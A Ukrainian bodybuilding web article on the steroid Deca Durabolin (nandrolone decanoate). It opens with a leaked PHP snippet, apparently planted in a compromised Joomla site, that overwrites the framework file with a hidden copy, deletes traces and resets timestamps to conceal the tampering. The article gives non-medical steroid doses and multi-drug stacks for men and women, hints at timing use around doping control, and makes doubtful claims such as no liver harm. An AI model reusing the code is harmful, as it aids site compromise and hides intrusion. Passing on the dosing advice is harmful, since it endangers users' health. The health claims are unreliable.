$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Дека дураболін | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Дека дураболін

Дека дураболінДека дураболін (ретаболіл) - це торгове найменування препаратів з чинною хімічною речовиною нандролон деканоат, які випускає компанія Organon. На сьогоднішній день Дека дураболін є одним з найбільш популярних і затребуваних ін'єкційних стероїдів. Незважаючи на те, що сьогодні нандролон деканоат входить до складу багатьох стероїдів, у атлетів всіх видів спорту воно асоціюється саме з Дека дураболін. Вперше Дека дураболін з'явився в продажу на початку 60-х років XX століття. Він випускався в ампулах різного об'єму, але найбільш популярними були ампули по 50 і 100мг/мл.

Настільки висока популярність цього препарату пояснюється його універсальністю разом з високою ефективністю. Компанія-виробник Дека дураболіна в інструкції із застосування до нього пише наступне: позитивний баланс азоту нандролон деканоатів є причиною його хорошої анаболічної дії. Справа в тому, що однією зі складових протеїну є саме азот у зв'язаному стані. Тому прийом Дека дураболіна стимулює м'язові волокна, і вони починають накопичувати азот. Причому кількість акумульованого в клітці азоту перевищує кількість, речовини яку вона віддає, в результаті утворюється позитивний баланс, наслідком якого і є зростання м'язової тканини. Крім того, компанія-виробник обумовлює в інструкції щодо застосування до Дека дураболіну той факт, що і накопичення азоту в м'язовій тканині, і вироблення білка, будуть відбуватися лише за умови, що спортсмен буде вживати достатню для цих процесів кількість протеїнів і калорій, в іншому випадку прийом препарату навряд чи зможе дати бажаний результат. Незважаючи на невелику кількість андрогенного компонента в складі ретаболілу, він у поєднанні з сильною анаболічною дією цього препарату гарантує високий приріст сили і мускулатури. Серед недоліків Дека дураболіну можна відзначити накопичення рідини в організмі, хоча і значно менше, ніж при прийомі ін'єкційних тестостеронів, але, тим не менше, достатню для додачі мускулатурі гладкого надутого виду. Особливо це помітно, якщо приймати препарат у великих дозах. Хоча цей факт має і свої достоїнства, зокрема, прийом цього стероїду за рахунок накопичення в організмі рідини забезпечує додаткове змащення суглобів, полегшуючи або ж усуваючи біль. Тому багато хто з спортсменів, які страждають на захворювання суглобів, віддають перевагу прийому ретаболілу іншим подібним препаратам, оскільки він дозволяє їм тренуватися, не відчуваючи болю у суглобах. Також Дека дураболін здійснює блокування рецепторів кортизолу, завдяки чому він практично перестає подаватися до м'язової та сполучної тканини. Для багатьох спортсменів Дека дураболін це улюблений, якщо не єдиний, засіб, що дозволяє нарощувати мускулатуру, коли вони готуються до змагань. Високий приріст м'язової маси при прийомі Дека дураболіну пояснюється тим, що в організмі одночасно з накопиченням води починає синтезуватися протеїн.

Що стосується дозування, то оптимальним вважається прийом не більше 200-600 мг препарату на тиждень. Як показала практика і наукові дослідження, розрахунок тижневої дози Дека дураболіну варто проводити згідно з 4мг на 1 кг ваги спортсмена. Ті, хто тільки починає приймати стероїдні препарати, повинні обмежитися дозою в 200мг. Прийом менш 200мг на тиждень не дає бажаного результату, спостерігається лише слабкий анаболічний ефект. Багато в чому функціональність Дека дураболіну залежить саме від прийнятої дози, коли вона оптимальна - 200-600мг на тиждень - спостерігається високий анаболічний ефект, що зростає з її збільшенням. Проте ж, якщо перевищити щотижневу дозу в 600мг, то велика ймовірність прояву побічних ефектів, а ось більш дієвим препарат від цього не стає, тобто прийом 1000 або 600мг препарату дають практично однаковий ефект, з тією лише різницею, що в першому випадку виявляються ще й негативні наслідки прийому препарату. Найчастіше, щоб досягти більш високих результатів, ретаболіл комбінують з іншими препаратами, наприклад, з тестостероном і метандростенолон. До речі, саме в поєднанні з останнім Дека дураболін дає високий приріст м'язової маси за короткий час. Для цього спортсмени, як правило, використовують наступне дозування: Дека дураболін 200-400мг на тиждень і метандростенолон 15-40 мг на день. Ті ж, хто хоче отримати результати в найкоротші терміни, використовують для цього щотижневу комбінацію Дека дураболін 400мг і сустанон 250 - 500мг. Якщо ж на тижні приймати 400мг Дека дураболін, 500мг сустанон 250 і щодня 30 мг метандростенолон, то результати будуть просто приголомшливими. Виходячи з вищесказаного, можна зробити висновок, що Дека дураболін є ефективним стероїдом, який не тільки дає необхідні результати, але і чудово поєднується з іншими стероїдами для досягнення більш швидкого ефекту.

Не можна сказати, що Дека дураболін є самим вдалим вибором для підготовки до змагань, але, тим не менш, багато атлетів завдяки цьому стероїду досягають відмінних результатів. Єдине, що потрібно пам'ятати, ретаболіл не варто приймати на протязі тривалого часу, оскільки цей стероїд викликає скупчення надлишків води в організмі, особливо якщо спортсмен приймає великі дози препарату.

Хоча прийом іншого ін'єкційного дураболіну, що відрізняється більш швидкою дією завдяки хімічній речовині, нандролон фнілпропіоната, дозволяє уникнути цієї проблеми. Ароматизація діючої речовини можлива і в цьому випадку, але спостерігається лише тоді, коли дозування препарату перевищує 400мг на тиждень.

Якщо на змаганнях буде проводитися допінг-контроль, то краще утриматися від прийому Дека дураболіну, оскільки його продукти розпаду затримуються в організмі на досить тривалий період. Для інших змагань при підготовці можна використовувати 400мг Дека дураболін на тиждень в якості базисного засобу. Андрогени, що містяться в цій дозі, крім основної функції також сприяють більш швидкій регенерації тканин. Для того щоб уникнути накопичення води в організмі, що викликається прийомом Дека дураболіну, необхідно використовувати його в поєднанні з Нольвадексом і Провіроном. Також у спортсменів широко поширена наступна комбінація, призначена для щотижневого прийому: 400мг Дека дураболіну, 500мг Вінстрола, 228 мг Параболана і 25мг оксандролону. Можливість прояву побічних ефектів від прийому ретаболілу мала, якщо його щотижнева доза не перевищує 400мг, проте ж далеко не всі дотримуються цієї дози, в наслідок чого можуть проявитися наступні андрогенно обумовлені явища: зниження здатності згущування крові, що призводить до частих кровотеч з носа і довгому загоєнню подряпин, підвищений тиск крові в судинах, посилена діяльність сальних залоз, поява акне і головні болі. Якщо брати високу дозу цього стероїду протягом тривалого часу, то можливе зниження сексуального апетиту, а також зниження кількості тестостерону, що виробляється яєчками. Це пояснюється тим, що Дека дураболін гальмує викид гонадропінів з гіпофіза.

Що стосується жінок, то, якщо вони дотримуватимуться щотижневого дозування в 200мг Дека дураболіну, то побічні ефекти не дають про себе знати. Але перевищуючи зазначену дозу можна зіткнутися з явищем маскулінізації, що проявляється в огрублені голосу, акне, підвищення лібідо, підвищений ріст волосся, гіпертрофія клітора. У той же час прийом 50 мг Дека дураболіну дозволяє справитися з проблемами шкіри, покращуючи її стан.

Прийом 50 мг швидкодіючого дураболіну 1-2 рази на тиждень не призводить до скупчення андрогенів в організмі, чого не можна сказати про довго діючий Дека дураболін. Багато спортсменок приймають 50 мг ретаболілу на тиждень, поєднуючи його з щоденним прийомом 10мг Оксандрополона. Ці препарати містять невелику кількість андрогенів, тому їх прийом в дозах, що не перевищують оптимальні, не сприяє прояву явища маскулінізації. У такому поєднанні Дека дураболін відповідає за приріст м'язів, завдяки підвищеному синтезу протеїнів, а оксандролон забезпечує приріст сили, не накопичуючи при цьому в організмі надлишків води. Крім цього поєднання стероїдів у спортсменок також використовуються наступні комбінації: ін'єкційний Дека дураболін і оральний Вінстрол або ж ін'єкційних Дека дураболін і оральний Прімоболан.

Дека дураболін один з не багатьох препаратів, що не спричиняють негативного впливу на печінку, тому його прийом можливий навіть для тих спортсменів, які страждають захворюваннями цього органу. Дослідження показали, що навіть тривалий прийом Дека дураболіну протягом декількох років не призводить до пошкодження печінки. Зате комбінація препаратів ретаболілу і метандростенолону може викликати підвищену секрецію печінки, яка, правда, нормалізується, якщо припинити прийом метандростенолону, але продовжити курс Дека дураболіну. Ті спортсмени, які піклуються про своє здоров'я, вважають за краще поєднувати Дека дураболін з Андріолом, приймаючи його по 240-280мг в день. Справа в тому, що прийом Андріола також не має впливу на печінку, оскільки продукти його розпаду виводяться з організму іншими шляхами.
 
Статті СТЕРОЇДИ Дека дураболін